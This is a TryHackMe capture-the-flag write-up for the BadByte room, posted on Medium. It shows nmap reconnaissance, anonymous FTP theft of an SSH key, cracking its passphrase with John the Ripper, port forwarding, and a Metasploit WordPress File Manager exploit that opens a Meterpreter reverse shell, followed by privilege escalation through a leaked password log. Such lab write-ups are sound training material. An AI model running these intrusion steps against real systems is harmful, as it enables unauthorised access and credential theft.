BadByte — TryHackMe

BadByte-THM

This is a write-up for TryHackMe’s room named BadByte. This is a beginner's friendly room. We need to infiltrate BadByte and then to take over root.Let’s start the enumeration process using nmap.

Reconnaissance

NMAP

# Identify the list of services running on the target machine
⇒ sudo nmap -sS -Pn -T4 -p- 10.10.114.112

$ sudo nmap -sS -Pn -T4 -p- 10.10.114.112                                                                                                 
PORT STATE SERVICE
22/tcp open ssh
30024/tcp open unknown

# Perform further information gathering on the open ports identified above
⇒ sudo nmap -O -A -Pn -T4 -p22,30024 10.10.114.112

$ sudo nmap -O -A -Pn -T4 -p22,30024 10.10.114.112
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 e3:89:a3:33:67:85:ac:08:a5:0f:1a:d4:79:78:d2:66 (RSA)
| 256 c1:93:e9:26:b8:9b:85:bc:c2:8e:08:a2:a4:85:f6:85 (ECDSA)
|_ 256 dd:e1:5c:32:d1:fc:a3:c5:4a:0e:bf:c8:c2:79:e4:71 (ED25519)
30024/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r-- 1 ftp ftp 1752 Dec 27 19:55 id_rsa
|_-rw-r--r-- 1 ftp ftp 78 Dec 28 16:50 note.txt
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.8.98.192
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 1
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status

All the answers in this section can be answered from the above scans.

Foothold

From the Reconnaissance section we saw FTP is running with Anonymous login allowed and also we saw two file that can be accessed. FTP to the target and get both these files locally:

ftp 10.10.114.112 30024
Connected to 10.10.114.112.
220 (vsFTPd 3.0.3)
Name (10.10.114.112:kali): Anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> prompt off
Interactive mode off.
ftp> mget *
local: id_rsa remote: id_rsa
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for id_rsa (1752 bytes).
226 Transfer complete.
1752 bytes received in 0.00 secs (1.2952 MB/s)
local: note.txt remote: note.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for note.txt (78 bytes).
226 Transfer complete.
78 bytes received in 0.00 secs (64.4978 kB/s)
ftp> quit
221 Goodbye.

id_rsa is private SSH key, but it is encrypted and we can crack it using ssh2john.py which comes by default with kali:

$ /usr/share/john/ssh2john.py id_rsa > id_rsa.hash

$ john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa.hash
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes
Cost 2 (iteration count) is 2 for all loaded hashes
Will run 4 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
[REDACTED] (id_rsa)
1g 0:00:00:07 DONE (2021-03-13 19:16) 0.1369g/s 1964Kp/s 1964Kc/s 1964KC/s ..*7¡Vamos!
Session completed

$ john --show id_rsa.hash 127 ⨯
id_rsa:[REDACTED]
1 password hash cracked, 0 left

note.txt gives us a username. Username and the cracked ssh key gives us the answers for this section.

Port Forwarding

Setup up Dynamic port forwarding using SSH and a SOCKS proxy by adding the following entry in /etc/proxychains.conf on the local kali machine:

socks5 127.0.0.1 1337

Remember to comment this line in the conf file:

socks4 127.0.0.1 9050

Now use SSH with private key,the username and the passphrase/password which we cracked in the last section:

$ ssh -i id_rsa -N -D 1337 [REDACTED]@10.10.114.112
Enter passphrase for key 'id_rsa':

Now just use NMAP with proxychains, which will indirectly scan the remote target:

$ proxychains nmap -sT 127.0.0.1                                                                                                         
ProxyChains-3.1 (http://proxychains.sf.net)
Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-13 19:28 EST
|S-chain|-<>-127.0.0.1:1337-<><>-127.0.0.1:80-<><>-OK
|S-chain|-<>-127.0.0.1:1337-<><>-127.0.0.1:995-<--timeout
---
---
---
Nmap scan report for localhost (127.0.0.1)
Host is up (0.020s latency).
Not shown: 997 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
3306/tcp open mysql

This nmap scan result should answer the question asked in this section.

Now as we know that port 80 is open internally on the target, we can use local port forwarding to access that port on our local kali machine using:

ssh -i id_rsa -L 8080:127.0.0.1:80 [REDACTED]@10.10.218.159

Use the same username which we found earlier.Access web-page locally as:

http://127.0.0.1:8080/

Web Exploitation

It is pretty clear which CMS is running on the target from the web-page. Let’s use NMAP again which can also scan for vulnerabilities on the target with nse scripts using 127.0.0.1 and port 8080 as the target:

$ nmap --script http-wordpress-enum --script-args check-latest=true,search-limit=1500 -p 8080 127.0.0.1        
Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-13 21:23 EST
Nmap scan report for localhost (127.0.0.1)
Host is up (0.00010s latency).
PORT STATE SERVICE
8080/tcp open http-proxy
| http-wordpress-enum:
| Search limited to top 1500 themes/plugins
| themes
| twentyseventeen 1.5
| plugins
| akismet
| duplicator 1.3.26 (latest version:1.4.0)
|_ wp-file-manager 6.0 (latest version:7.1)
Nmap done: 1 IP address (1 host up) scanned in 69.75 seconds

Now searching on the inter-webs for these plugins gives the CVE’s associated with them:

Now searching forone of the CVE inside MSF console gives us a RCE which can be easily exploited by setting the following:

msf6 > search CVE-2020-REDACTEDMatching Modules
================
# Name Disclosure Date Rank Check Description
---- --------------- ---- ----- -----------
0 exploit/multi/http/wp_file_manager_rce 2020-09-09 normal Yes WordPress File Manager Unauthenticated Remote Code Execution
Interact with a module by name or index. For example info 0, use 0 or use exploit/multi/http/wp_file_manager_rcemsf6 > use 0
[*] Using configured payload php/meterpreter/reverse_tcp
msf6 exploit(multi/http/wp_file_manager_rce) > show options
Module options (exploit/multi/http/wp_file_manager_rce):Name Current Setting Required Description
---- --------------- -------- -----------
COMMAND upload yes elFinder commands used to exploit the vulnerability (Accepted: upload, mkfile+put)
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes Base path to WordPress installation
VHOST no HTTP server virtual host
Payload options (php/meterpreter/reverse_tcp):Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:Id Name
-- ----
0 WordPress File Manager 6.0-6.8
msf6 exploit(multi/http/wp_file_manager_rce) > set LHOST tun0
LHOST => 10.8.98.192
msf6 exploit(multi/http/wp_file_manager_rce) > set RHOSTS 127.0.0.1
RHOSTS => 127.0.0.1
msf6 exploit(multi/http/wp_file_manager_rce) > set RPORT 8080
RPORT => 8080
msf6 exploit(multi/http/wp_file_manager_rce) > exploit
[*] Started reverse TCP handler on 10.8.98.192:4444
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable.
[*] 127.0.0.1:8080 - Payload is at /wp-content/plugins/wp-file-manager/lib/files/omCtHP.php
[*] Sending stage (39282 bytes) to 10.10.218.159
[*] Meterpreter session 1 opened (10.8.98.192:4444 -> 10.10.218.159:60366) at 2021-03-13 21:43:30 -0500
[+] Deleted omCtHP.php
meterpreter > pwd
/usr/share/wordpress/wp-content/plugins/wp-file-manager/lib/files
meterpreter > ps -ef
Process List
============
PID Name User Path
--- ---- ---- ----
1 /sbin/init root /sbin/init auto automatic-ubiquity noprompt
------822 /usr/sbin/apache2 [REDACTED] /usr/sbin/apache2 -k startmeterpreter > cd /home/REDACTED
meterpreter > ls
Listing: /home
==============
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
40755/rwxr-xr-x 4096 dir 2021-01-18 08:53:09 -0500 REDACTED
40755/rwxr-xr-x 4096 dir 2020-12-28 11:52:33 -0500 REDACTED
Listing: /home/REDACTED
==================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100664/rw-rw-r-- 38 fil 2020-12-28 11:53:01 -0500 user.txt
meterpreter > cat user.txt
THM{REDACTED}
meterpreter >

So from above we got the user that was running CMS(the user running apache2 process) and also the user’s flag.

We can also enumerate user’s with WPScan:

$ wpscan --url http://127.0.0.1:8080/ --enumerate u
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.15
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+] URL: http://127.0.0.1:8080/ [127.0.0.1]
[+] Started: Sat Mar 13 21:34:11 2021
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:00 <===================================================================> (10 / 10) 100.00% Time: 00:00:00
[i] User(s) Identified:[+] [REDACTED]
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)

Privilege Escalation

From the meterpreter session which we got in the last section,browse the file system and notice that this file looks suspicious /var/log/bash.log

meterpreter > cd /var/log
meterpreter > ls -lrt bash.log
100644/rw-r--r-- 1859 fil 2021-01-18 08:53:09 -0500 bash.log
meterpreter > cat bash.log
Script started on 2021-01-15 16:42:35+0000
[REDACTED]

This file gives us user’s password and the new password can be easily guessed following the pattern given in the room’s current section details.We can now use SSH to login with this new user found(the user who is running Wordpress/Apache2) and the password guessed.Running sudo -l tells us that this user can run anything as root,so let’s just run sudo su which gives us root and root flag at /root/root.txt

That it. Thanks for reading.

--

--

--

Software Developer having keen interest in Security, Privacy and Pen-testing. Certs:- Security+,PenTest+,AZ900

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

NIST Cyber security Framework

{UPDATE} Despicable Balls Hack Free Resources Generator

Round 2: NEST Pizza Day!

The Growing Lack of Trust in Data Privacy

A Private Sale will close on November 15th!

SWIFT gpi tracker — Mandatory changes for FIN participants from November 2020

Ramifications of LockBit 2.0 ransomware recruitment

Ramifications of LockBit 2.0 ransomware recruitment

{UPDATE} Starborn Anarkist Hack Free Resources Generator

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
0xsanz

0xsanz

Software Developer having keen interest in Security, Privacy and Pen-testing. Certs:- Security+,PenTest+,AZ900

More from Medium

TRY HACK ME: Intro to C2 Write-Up

Vulnhub : Earth Walkthrough

OSINT: Corporate Recon — HTB Academy Walkthrough

roottusk/vapi Writeup